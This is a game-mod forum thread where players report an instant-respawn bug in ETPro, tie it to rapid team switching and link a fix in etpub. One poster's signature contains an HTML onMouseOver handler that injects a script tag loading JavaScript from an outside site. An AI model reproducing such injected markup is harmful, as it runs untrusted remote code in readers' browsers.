Instant respawn bug

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

Spoofeh

Instant respawn bug

Post by Spoofeh »

I was playing Dubrovnik tonight on etpro 3.2.1, and managed to respawn instatly when I was killed (with 6 seconds left according to the timer).

This was the only time during the game I tapped out, so I don't know if it was a one time thing or repeatable (or if I just was in a different timezone than the rest of my team :P). Maybe the fact that I had switched from axis to allies a few minutes before this has something to do with it.

Demo available.
ReyalP

Post by ReyalP »

I think that I have had this before (both in RTCW and ET) but I'm not 100% sure.
send lawyers, guns and money
EagleReloaded

Post by EagleReloaded »

I have this whenever I switch from Axis to Allies on Gold Rush, I can respawn instantly until I change class or /kill.
Some people play tennis, I erode the human soul.
fretn

Post by fretn »

I think that bug exists in rtcw too, in the map mp_ufo with the changing spawtime, (20secs if you got flag, 30 if you dont) most of the time when the flag is taken there's instant spawn
Day by day : http://w.twwwo.be/
Rain

Post by Rain »

I've had this occur on several occasions, but it seems all but impossible to reproduce when you want to debug it.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
KillerWhale

Post by KillerWhale »

Did you change teams twice fast after each other?

There seems to be a serious bug in etpro (well it's a etmain bug not fixed in etpro) granting instant respawn, just switch to the other team and back fast and you are able to respawn instantly.
I had set the both respawntimes to 999 and was able to respawn with 973 on the clock.

This bug is fixed in etpub, so you might want to look at their code.

I look it up and post it later.

EDIT:
Found it:
http://linespeed.net/projects/etpub/changeset/618
EagleReloaded

Post by EagleReloaded »

Rain wrote:I've had this occur on several occasions, but it seems all but impossible to reproduce when you want to debug it.
Amen, whenever I've gone to record a demo to show it, it's stopped =/ Hence why I gave up caring about it.
Ragnar_40k

Post by Ragnar_40k »

EagleReloaded wrote:
Rain wrote:I've had this occur on several occasions, but it seems all but impossible to reproduce when you want to debug it.
Amen, whenever I've gone to record a demo to show it, it's stopped =/ Hence why I gave up caring about it.
So the fix is to record a demo? :lol:
The Emperor watch over you.
EagleReloaded

Post by EagleReloaded »

Or change class :? Or /kill.
forty

Post by forty »

I've had this occur on several occasions, but it seems all but impossible to reproduce when you want to debug it.
Near impossible. Luckily by chance I found I could reproduce it by switching team several times in a row.